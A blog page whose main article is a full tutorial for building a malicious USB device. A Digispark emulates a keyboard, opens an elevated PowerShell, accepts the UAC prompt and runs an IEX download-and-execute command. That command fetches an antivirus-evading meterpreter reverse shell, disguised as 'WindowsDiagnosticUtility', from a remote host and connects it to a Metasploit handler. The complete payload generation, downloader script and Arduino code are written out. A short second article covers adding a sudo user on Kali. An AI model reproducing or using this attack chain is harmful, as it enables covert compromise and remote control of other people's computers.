View Article

Digispark, Powershell, Veil and Metasploit

Digispark USB Development BoardSummary

Over the course of this exercise we will be building a USB exploit device from a Digispark USB Development board. The requirements for this exercise are a Kali machine or virtual machine, and Digispark USB Development board.

Split over 4 parts we will be covering the installation of Veil-Evasion and creating a custom exploit for it, Creating our powershell downloader, Setting up our metasploit listener and creating the Digispark script.

Part 1 - Creating the Exploit with Veil-Evasion

Veil Evasion is a tool developed for generating payloads that bypass common anti-virus solutions. This isn't available by default in Kali so our first task is to install it.

root@kali:~# apt-get install veil-evasion

IMPORTANT NOTE: Make sure your first run of Veil Evasion is through a terminal spawned from a GUI as the first run install procedure will run some wine installers for Python and Ruby.

Now run Veil Evasion.

root@kali:~# veil-evasion

After the first install you will be presented with the menu below.

=========================================================================
 Veil-Evasion | [Version]: 2.28.2
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Main Menu

	51 payloads loaded

 Available Commands:

	use         	Use a specific payload
	info        	Information on a specific payload
	list        	List available payloads
	update      	Update Veil-Evasion to the latest version
	clean       	Clean out payload folders
	checkvt     	Check payload hashes vs. VirusTotal
	exit        	Exit Veil-Evasion

 [menu>>]: list

Type "list" to see a list of all payloads. For this exercise we will be using the c/meterpreter/rev_tcp payload. So enter number "6".

 Payload: c/meterpreter/rev_tcp loaded

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 COMPILE_TO_EXE  	Y       	Compile to an executable
 LHOST           	        	IP of the Metasploit handler
 LPORT           	4444    	Port of the Metasploit handler

 Available Commands:

	set         	Set a specific option value
	info        	Show information about the payload
	options     	Show payload's options
	generate    	Generate payload
	back        	Go to the main menu
	exit        	exit Veil-Evasion

 [c/meterpreter/rev_tcp>>]: 

Now we have the payload selected, we can view some info and generate it. But first we need to tell the payload where to connect back to. This will be the IP of the listening host. To this we will set the LHOST option with the set command.

 [c/meterpreter/rev_tcp>>]: set LHOST endpoint.testorg.com
 [i] LHOST => endpoint.testorg.com

Now running the options command will show our updated setup. If required you can change the listening port. But be sure to match it when we setup the meterpreter later on.

 [c/meterpreter/rev_tcp>>]: options

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 COMPILE_TO_EXE  	Y       	Compile to an executable
 LHOST           	endpoint.testorg.com	IP of the Metasploit handler
 LPORT           	4444    	Port of the Metasploit handler

With the payloads options set, it is time to create the payload. Type "generate" and hit enter, you will be prompted for a base name. For this test we will use "WindowsDiagnosticsUtility" as this is how it will show in the windows task manager and "DansHiddenExploit" is a bit more obvious. Once done we will have our exe. By default Veil will output to the folder /var/lib/veil-evasion/output/compiled/.

 [*] Executable written to: /var/lib/veil-evasion/output/compiled/WindowsDiagnosticUtility.exe

 Language:		c
 Payload:		c/meterpreter/rev_tcp
 Required Options:      COMPILE_TO_EXE=Y  LHOST=endpoint.testorg.com
                        LPORT=4444
 Payload File:		/var/lib/veil-evasion/output/source/WindowsDiagnosticUtility.c
 Handler File:		/var/lib/veil-evasion/output/handlers/WindowsDiagnosticUtility_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] Press any key to return to the main menu.

If you used a VM for creating your exploit, you can use shared folders to transfer this somewhere on your VM host or directly upload this to where you will later want to download it from.

Part 2 - Creating the Powershell downloader

The powershell script is very straight forward. It will be run and an Invoked-Expression by the Digispark, so its only purpose is to grab and execute our exploit.

$down = New-Object System.Net.WebClient
$url  = 'http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.exe';
$file = 'WindowsDiagnosticUtility.exe';
$down.DownloadFile($url,$file); $exec = New-Object -com shell.application $exec.shellexecute($file);

That about covers the contents of the file, save it as a .ps1 file and upload it alongside your exploit.

This could all be hard written to the Digispark, however by limiting the script on the digispark to typing a single line and grabbing this powershell downloader, we can update the script and payload without having to reflash the digisparks at a later date.

Part 3 - Creating the Metasploit Handler

We have our delivery script, we have our payload. Now we need a method of handling the reverse connection generated by our payload. 

If you aren't using DNS, this would be the machine to which our payload connects to. Back in step 1 we set the LHOST for our payload to endpoint.testorg.com. For my setup, I use a dynamic dns name as my LHOST, this is then forwarded through the firewall on the required port (4444 default) to my handling client. 

So lets fire up Metasploit console.

root@kali:~# msfconsole

=[ metasploit v4.14.1-dev ] + -- --=[ 1628 exploits - 927 auxiliary - 282 post ] + -- --=[ 472 payloads - 39 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >

Next we want to create our background handler.

msf > use exploit/multi/handler
msf exploit(handler) >  

Select the exploit/multi/handler with the use command. Next up set the listening port and IP. Setting to 0.0.0.0 will listen on all interfaces. You can select a specific interface by supplying the IP address for it.

REMEMBER: If you changed the port when creating the payload be sure to adjust the LPORT value here to match.

msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444

Now we can run the exploit in the background. We do this with exploit -j.

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.86:4444 
[*] Starting the payload handler...

We can check for connected payloads with sessions -l at this point there are no connections, we will get to handling and using the connections in the Testing section.

msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

Now we have our handler. Lets setup the delivery USB device.

Part 4 - Coding the Digispark for delivery

Finally our delivery method. We will be covering the setup of the Digispark in a future article and review on it, but for now you can use the Digistump Wiki (https://digistump.com/wiki/digispark/tutorials/connecting)

So the .ino (Arduino Script) that we will be using is as follows.

#include "DigiKeyboard.h"

void setup() {
  // Setup LED Outputs
  pinMode(0, OUTPUT); //LED on Model B
  pinMode(1, OUTPUT); //LED on Model A  

  // Get an elevated powershell
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(1000); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000); 

  // Invoke Expression of the downloaded ps1 script file.
  DigiKeyboard.print("IEX(New-Object Net.WebClient).DownloadString(@http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1@);");
DigiKeyboard.delay(1000); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); // Wait a couple of seconds and then exit powershell DigiKeyboard.print("exit"); DigiKeyboard.delay(100); DigiKeyboard.sendKeyStroke(KEY_ENTER); } void loop() { // Flash the LED to say we are done. digitalWrite(0, HIGH); // turn the LED on (HIGH is the voltage level) digitalWrite(1, HIGH); delay(250); // wait for a second digitalWrite(0, LOW); // turn the LED off by making the voltage LOW digitalWrite(1, LOW); delay(250); }

In a nutshell this script will emulate a keyboard to open an elevated powershell prompt, it will then download and execute the powershell script we created in step 2 and then close the window after it is done.

Now lets take a look at the script in more detail. Firstly we include the Keyboard header file for the Digispark.

#include "DigiKeyboard.h"

There are 2 main required sections for an Arduino script to perform, firstly a setup function, this is called when the device is powered up, the loop function is called once setup completes.

So as we only want the payload to be ran once, I've bundled the main meat of it into the setup function. This may be at odds with general convention here but it works for me. Now lets dig into the setup function.

These first few lines setup the LED for later use. We are going to make it blink once the payload is complete.

// Setup LED Outputs
  pinMode(0, OUTPUT); //LED on Model B
  pinMode(1, OUTPUT); //LED on Model A  

Next up we will get ourselves an elevated powershell. The following code presses the windows key, MOD_GUI_LEFT, types in "powershell" into the search bar. The presses a combination of the Ctrl, Shift and Enter keys to run it as admin. We then press the left arrow followed by the enter key to select yes on the UAC popup we are presented with.

// Get an elevated powershell
  DigiKeyboard.sendKeyStroke(0); //
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(1000); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000); 

With that complete we now have an elevated powershell instance. So lets grab and run our powershell script we made earlier. We replace double quotes (") with the @ symbol to get around input type limitations when using a British English system. For a US English language system, you can replace the @ symbol with quotes.

This script will output the command to invoke an expression, in this case the expression will be the text content of our powershell script, followed by the enter key. This will download the payload and execute it as per the powershell script.

// Invoke Expression of the downloaded ps1 script file.
  DigiKeyboard.print("IEX(New-Object Net.WebClient).DownloadString(@http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1@);");
DigiKeyboard.delay(1000); DigiKeyboard.sendKeyStroke(KEY_ENTER);

Finally we clean up and close the powershell window by calling exit.

// Wait a couple of seconds and then exit powershell 
DigiKeyboard.delay(2000); DigiKeyboard.print("exit"); DigiKeyboard.delay(100); DigiKeyboard.sendKeyStroke(KEY_ENTER);

With the main setup function complete, the Digispark will now execute the loop function. For this exercise all the loop function will do is cause the LED we setup in the setup function blink every half second.

// Flash the LED to say we are done.
  digitalWrite(0, HIGH);   // turn the LED on (HIGH is the voltage level)
  digitalWrite(1, HIGH);
  delay(250);               // wait for a second
  digitalWrite(0, LOW);    // turn the LED off by making the voltage LOW
  digitalWrite(1, LOW); 
  delay(250); 

With the script written, save it, and hit the upload button on the Arduino IDE. This will build the script and prompt you to plug in the Digispark to finish the upload. Now we have our bad USB device. We can move onto testing!

Testing

The testing platform used is a Windows 7 VM running on Oracle Virtual Box in bridged networking mode on top of a Windows 10 host. A Kali Laptop on the same network (however importantly still using remote powershell hosting, payload hosting and remote IP).

We start up the meterpreter shell on the Kali machine, and run the exploit in background mode (-j option). Then we insert the USB into the Windows 7 VM. The Digispark connects as a HID device and runs the script, downloading and executing the payload, opening the meterpreter connection to the Kali laptop. 

From there we are in, we can create persistance with the backdoors, grab screenshots, and use the command shell. We are working on a meterpreter guide with some examples that will elaborate on its usage.

Demonstration Video

 

View Article

Creating a non-root sudo user on Kali

A quick walkthrough on creating a new non-root user on Kali Linux and adding this user to the sudoers. In this brief guide we will add a user called dan and add this user to the sudoers group. To get started open a terminal window. With the window now open issue the following command

useradd -m dan 

This will add a new user named dan, the -m option creates a home directory for the user. This home directory will usually be located at /home/dan unless your default home directory location has been changed. Next lets add a password to the account.

In your terminal window issue the following command.

passwd dan

This will prompt you to enter a password for the newly created user.

Now its time to add the user to the sudoers group. This will allow the user to execute commands with root privileges by prefixing the command with sudo and entering their password.

usermod -a -G sudo dan

The -a option tells usermod you are adding, -G sudo  means the group sudo and then the user. Now we have added the user, set a password and added them to sudoers, we must specify a shell for the user.

chsh -s /bin/bash dan

This command changes the shell to the one specified after -s for the user. After this you are all done. You can logout of root and login as your newly created user. Any commands or scripts requiring elevation can be executed by prefixing with sudo and entering the users password.